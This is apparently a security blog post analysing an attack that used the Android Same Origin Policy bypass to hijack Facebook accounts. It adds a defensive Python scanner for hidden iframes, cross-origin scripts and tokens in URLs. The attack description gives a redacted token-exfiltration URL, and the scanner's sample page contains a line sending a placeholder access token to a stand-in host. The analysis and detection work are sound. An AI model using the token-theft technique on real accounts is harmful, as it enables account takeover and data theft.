A few months back, we discussed the Android Same Origin Policy (SOP) vulnerability, which we later found to have a wider reach than first thought. Now, through a collaboration between Trend Micro and Facebook, we have found attacks that actively attempt to exploit this particular vulnerability; we believe the attack code was based on publicly available Metasploit code.
This attack targets Facebook users via a link in a particular Facebook page that leads to a malicious site. This site contains obfuscated JavaScript code (see Figure 1 below), which includes an attempt to load a Facebook URL (seen in Figure 2) in an inner frame. The user sees only a blank page, because the page's HTML hides its content via a div tag (Figure 3), while the inner frame is one pixel in size (Figure 4).
Figure 1. Malware code segment upon opening the Facebook page
Figure 2. Corresponding content of opened Facebook page
Figure 3. The main page is set to be invisible
Figure 4. The inner frame has a size of one pixel
While these routines are being carried out, the SOP bypass is performed: a remote JavaScript file is loaded from a legitimate cloud storage provider.
Figure 5. The JavaScript file that performs SOP bypass
This file contains the malicious code of the attack and allows attackers to carry out the following activities or routines on Facebook:
- Add friends
- Like and follow Facebook pages
- Modify subscriptions
- Authorize a Facebook app to access the user’s public profile, friends list, birthday information, likes and friends’ likes
- Steal the victim’s access tokens and upload them to their server at http://{BLOCKED}martforchristmas.website/walmart/j/index.php?cid=544fba6ac6988&access_token= $token;
- Collect analytics data (such as victims’ location, HTTP referrer, etc.) using the legitimate service at https://whos.{BLOCKED}ung.us/pingjs/
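The page pattern described above (a container hidden with a div, a one-pixel inner frame pointing at a cross-origin URL, a script pulled from a third-party host, and an access token carried in a URL query string) is something a web proxy or crawler can flag statically before any script runs. The following scanner is an added example written for this post, not code from Trend Micro or from the attack; the HTML it scans is a constructed sample, and the hostnames in it are placeholders.

```python
"""Static indicator scan for the hidden-iframe / remote-script pattern described above.

Added example for this post, not Trend Micro's code. The sample page below is
constructed; '.example' hostnames are placeholders, not real indicators.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse, parse_qs


def _px(value):
    """Parse a width/height attribute such as '1' or '1px' into an int (None if not a plain pixel size)."""
    if value is None:
        return None
    value = value.strip().lower()
    if value.endswith("px"):
        value = value[:-2]
    return int(value) if value.isdigit() else None


class PageIndicatorScanner(HTMLParser):
    """Collects (kind, detail) findings for the four indicators discussed in the text."""

    def __init__(self, page_origin):
        super().__init__()
        self.page_host = urlparse(page_origin).hostname
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        style = (a.get("style") or "").replace(" ", "").lower()

        # Indicator 1: the main content is hidden via a div (Figure 3).
        if tag == "div" and "display:none" in style:
            self.findings.append(("hidden_container", "div styled display:none"))

        # Indicator 2: a one-pixel inner frame loading another origin (Figure 4).
        if tag == "iframe":
            one_px_attrs = _px(a.get("width")) == 1 and _px(a.get("height")) == 1
            one_px_style = "width:1px" in style and "height:1px" in style
            if one_px_attrs or one_px_style:
                self.findings.append(("tiny_iframe", a.get("src", "")))

        # Indicator 3: script loaded from a host other than the page itself (Figure 5).
        if tag == "script" and a.get("src"):
            src_host = urlparse(a["src"]).hostname
            if src_host and src_host != self.page_host:
                self.findings.append(("cross_origin_script", a["src"]))

        # Indicator 4: an access token travelling in a URL query string.
        for attr in ("src", "href"):
            url = a.get(attr)
            if url and "access_token" in parse_qs(urlparse(url).query, keep_blank_values=True):
                self.findings.append(("token_in_url", url))


def scan_page(html, page_origin):
    """Return the list of (kind, detail) findings for one HTML document."""
    scanner = PageIndicatorScanner(page_origin)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


def is_suspicious(findings, min_kinds=2):
    """A page is flagged when at least `min_kinds` distinct indicator kinds co-occur."""
    return len({kind for kind, _ in findings}) >= min_kinds


# Constructed sample reproducing the layout the post describes; hostnames are placeholders.
SAMPLE_PAGE = """
<html><body>
<div style="display: none">
  <iframe src="https://www.facebook.com/" width="1" height="1"></iframe>
</div>
<script src="https://cloud-storage.example/payload.js"></script>
<img src="https://exfil.example/index.php?cid=TEST_ID&access_token=TOKEN_PLACEHOLDER">
</body></html>
"""
SAMPLE_ORIGIN = "https://landing-page.example/"

if __name__ == "__main__":
    for kind, detail in scan_page(SAMPLE_PAGE, SAMPLE_ORIGIN):
        print(f"{kind:20s} {detail}")
    print("suspicious:", is_suspicious(scan_page(SAMPLE_PAGE, SAMPLE_ORIGIN)))
```

Each indicator on its own is common on benign pages (tracking pixels, CDN-hosted scripts), which is why `is_suspicious` requires several kinds to co-occur; tune `min_kinds` to the false-positive rate your traffic tolerates, and feed the output to the same pipeline that reviews blocked URLs.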